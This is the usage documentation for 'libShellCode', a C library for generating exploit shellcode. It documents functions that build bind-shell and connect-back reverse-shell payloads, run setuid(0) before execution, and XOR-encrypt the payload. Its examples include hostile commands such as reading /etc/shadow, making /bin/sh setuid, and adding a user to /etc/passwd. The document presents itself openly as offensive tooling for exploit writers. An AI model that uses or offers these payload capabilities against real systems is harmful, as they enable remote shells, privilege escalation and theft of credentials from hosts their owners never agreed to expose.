/*
 *     __   ___   _
 *    /  \ |   \ | | /\---------<ShellCode Generator Library>----------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 *
 *
 */

Index:
------
0   - How i can use the library in my exploits?
1   - Function description
1.1 - libShellCode_version()
1.2 - generate_write_SC()
1.3 - generate_file_write_SC()
1.4 - generate_exec_SC()
1.5 - generate_bind_SC()
1.6 - generate_connect_back_SC()


0 - How i can use the library in my exploits?
---------------------------------------------
To use this library in your software you have to 

#include "libShellCode.h"

After this you can use the following library functions:

char *libShellCode_version();
char *generate_write_SC(int out, char *message, int setuid, int xor);
char *generate_file_write_SC(char *file, char *message, int setuid, int xor);
char *generate_exec_SC(char * prog, int setuid, int exit, int xor);
char *generate_bind_SC(char *prog, int setuid, int exit, int port, int fork, int xor);
char *generate_connect_back_SC(char *prog, int setuid, int exit, char *ip, int port, int xor);

Remember to include the library object when you compile the exploit.


1 - Function description
------------------------
This section describe the library function one by one.


1.1 - libShellCode_version()
----------------------------

Prototipe:
char *libShellCode_version();

Description:
This function return the version of libShellCode.

Parameters: 
none.

Return:      
The function return a pointer to a string containing the libShellCode version.


1.2 - generate_write_SC()
-------------------------

Prototipe:
char *generate_write_SC(int out, char *message, int setuid, int xor);

Description:
This function generates a ShellCode that writes a message to stdout or stderr.

Parameters:  
out           Specify where to write: 
              1 = stdout 
              2 = stderr

message       A pointer to the message that you want write

setuid        Specify if you want to execute setuid(0) or setreuid(0, 0) 
              before the open().
              0 = none
              1 = execute setuid(0)
              2 = execute setreuid(0, 0)

xor           Specify if you want to encript the shellcode.
              When the ShellCode is encripted a rutine that decript the cripted
              code at runtime is put before the standard Shellcode.
              0 = not encripted
              1 = XOR encription

Return:      
The function return a pointer to the ShellCode generated. The memory used for
the shellcode is allocated with malloc() so remember to free() it.


1.3 - generate_file_write_SC()
------------------------------

Prototipe:
char *generate_file_write_SC(char *file, char *message, int setuid, int xor);

Description: 
This function generates a ShellCode that writes a string to a file.
For example you can add one user to /etc/passwd, or write a message for 
the admin in root directory :)

Parameters:  
file          A pointer to the name of the file in which you want write

message       A pointer to the message that you want write

setuid        Specify if you want to execute setuid(0) or setreuid(0, 0) 
              before the open().
              0 = none
              1 = execute setuid(0)
              2 = execute setreuid(0, 0)

xor           Specify if you want to encript the shellcode.
              When the ShellCode is encripted a rutine that decript the cripted
              code at runtime is put before the standard Shellcode.
              0 = not encripted
              1 = XOR encription

Return:      
The function return a pointer to the ShellCode generated. The memory used for
the shellcode is allocated with malloc() so remember to free() it.


1.4 - generate_exec_SC()
------------------------

Prototipe:
char *generate_exec_SC(char *prog, int setuid, int exit, int xor);

Description: 
This function generates a ShellCode that executes the command specified by you.
You can execute whether simple commands without parameters, like:
- /bin/sh 
- /usr/bin/id

or more complex commands with parameters, like:
- /usr/X11R6/bin/xterm -display 192.168.1.100:0.0
- cat /etc/shadow
- chmod +s /bin/sh

Parameters:  
prog          A pointer to the the path of the command to execute (with parameters)
              (example: /bin/sh, /bin/cat /etc/passwd, ...)

setuid        Specify if you want to execute setuid(0) or setreuid(0, 0) 
              before the execve().
              0 = none
              1 = execute setuid(0)
              2 = execute setreuid(0, 0)

exit          Specify if you want to execute exit(0) after execve().
              If there is an error during the execve() and you have put the exit(0)
              call the program terminates correctly, else it crash.
              0 = Don't execute exit(0)
              1 = execute exit(0)

xor           Specify if you want to encript the shellcode.
              When the ShellCode is encripted a rutine that decript the cripted
              code at runtime is put before the standard Shellcode.
              0 = not encripted
              1 = XOR encription

Return:      
The function return a pointer to the ShellCode generated. The memory used for
the shellcode is allocated with malloc() so remember to free() it.


1.5 - generate_bind_SC()
------------------------

Prototipe:
char *generate_bind_SC(char *prog, int setuid, int exit, int port, int fork, int xor);

Description: 
This function generates a ShellCode that bind a program to a port.

Parameters:  
prog          A pointer to the the path of the command to execute (with parameters)
              (example: /bin/sh, /bin/cat /etc/passwd, ...)

setuid        Specify if you want to execute setuid(0) or setreuid(0, 0) 
              before the execve().
              0 = none
              1 = execute setuid(0)
              2 = execute setreuid(0, 0)

exit          Specify if you want to execute exit(0) after execve().
              If there is an error during the execve() and you have put the exit(0)
              call the program terminates correctly, else it crash.
              0 = Don't execute exit(0)
              1 = execute exit(0)

port          The number of the port you want to bind. The correct values are from 1
              to 65535. Remember that if you wont to bind a port <= 1024 you must 
              be root.

fork          Specify if you want to execute a fork() before execve().
              If you don't execute the fork() you can connect to the port only one time
              becouse the execve() call overwrite the process with the program you want
              execute. If you exec the fork() the child process exec the execve() and
              the father accept the next conncetion.

xor           Specify if you want to encript the shellcode.
              When the ShellCode is encripted a rutine that decript the cripted
              code at runtime is put before the standard Shellcode.
              0 = not encripted
              1 = XOR encription

Return:      
The function return a pointer to the ShellCode generated. The memory used for
the shellcode is allocated with malloc() so remember to free() it.


1.6 - generate_connect_back_SC()
--------------------------------

Prototipe:
char *generate_connect_back_SC(char *prog, int setuid, int exit, char *ip, int port, int xor);

Description: 
This function generates a ShellCode that connect to an IP:Port and execute a program.
To use this Shellcode remember to open a netcat session in the host you want to connect.

Parameters:  
prog          A pointer to the the path of the command to execute (with parameters)
              (example: /bin/sh, /bin/cat /etc/passwd, ...)

setuid        Specify if you want to execute setuid(0) or setreuid(0, 0) 
              before the execve().
              0 = none
              1 = execute setuid(0)
              2 = execute setreuid(0, 0)

exit          Specify if you want to execute exit(0) after execve().
              If there is an error during the execve() and you have put the exit(0)
              call the program terminates correctly, else it crash.
              0 = Don't execute exit(0)
              1 = execute exit(0)

ip            The IP number of the host you want to connect. You mast use the dotten
              notation for the IP number. Remember that the IP don't have to contain
              a 0 so you can't use addresses like 127.0.0.1.

port          The number of the port you want to connect. The correct values are from 1
              to 65535. 

xor           Specify if you want to encript the shellcode.
              When the ShellCode is encripted a rutine that decript the cripted
              code at runtime is put before the standard Shellcode.
              0 = not encripted
              1 = XOR encription

Return:      
The function return a pointer to the ShellCode generated. The memory used for
the shellcode is allocated with malloc() so remember to free() it.
